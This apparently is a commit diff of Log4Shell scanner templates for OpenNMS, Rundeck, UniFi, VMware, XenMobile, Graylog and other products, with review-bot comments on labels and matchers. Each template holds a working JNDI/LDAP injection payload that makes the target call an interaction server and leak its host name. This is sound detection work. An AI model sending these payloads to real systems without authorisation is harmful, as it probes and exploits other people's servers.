- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -22,6 +22,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs on 2022/10/23
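Review bot: The injection-point label for `j_username` is `postdata` here, while the MobileIron and Cisco sections of this commit tag the same kind of form field as `username`. Because the `group: 2` extractor prints this label as the injection point, one naming scheme across templates would make results easier to triage and to aggregate. I would use `${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}` here and decide the same way for the Rundeck, UniFi and XenMobile sections, which also use `postdata`.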


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Connection: close
Referer: {{BaseURL}}/user/login
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: location
@ -54,8 +58,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
{"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
matchers-condition: and
matchers:
@ -43,13 +47,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/06/03


@ -21,10 +21,14 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
matchers-condition: and
matchers:
@ -36,7 +40,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -48,8 +52,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -11,6 +11,10 @@ info:
shodan-query: title:"XenMobile"
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -23,7 +27,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -20,12 +20,16 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -37,17 +41,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/31


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
{
"authType": "password",
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
"username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
"password": "admin"
}
@ -46,16 +50,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/05
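Review bot: The comment on the matcher regex reads `# Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output`, but a matcher only decides whether the template fires and prints nothing. The same text sits on the `group: 1` extractor, where `\d{6}\.` is outside the capture, so only the host name is emitted and not the six-digit prefix. I would write `# Match six-digit marker followed by resolved ${hostName}` on the matcher and `# Print extracted ${hostName} in output` on the extractor. If the older `${sys:os.name}` pattern and its comment survive in the new file (the page has lost its +/- markers, so this is unclear), they are stale, because the request now sends `${hostName}`. The other sections of this commit carry the same comments.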


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.jsp
username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: location
@ -54,8 +58,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
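Review bot: The matcher accepts any six digits (`\d{6}`) rather than the `{{rand1}}{{rand2}}` value this request actually sent, so the marker is never compared with what was injected. A `word` matcher on `interactsh_request` for the exact marker would tie the interaction to this request's payload and reduce false positives from unrelated six-digit labels. This assumes the engine expands template variables inside matcher `words`, which should be confirmed for the minimum supported version. `matchers-condition: and` is already set, so the extra matcher can only narrow the result. The other templates in this commit share the same pattern.

```yaml
# … unchanged: regex matcher on interactsh_request …
- type: word
  part: interactsh_request
  words:
    - '{{rand1}}{{rand2}}' # exact marker injected by this request
```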


@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -33,7 +37,7 @@ http:
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
matchers-condition: and
matchers:
@ -45,7 +49,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -57,8 +61,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -23,6 +23,10 @@ info:
verified: "true"
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/ui/
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
matchers-condition: and
matchers:
@ -44,13 +48,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/04/05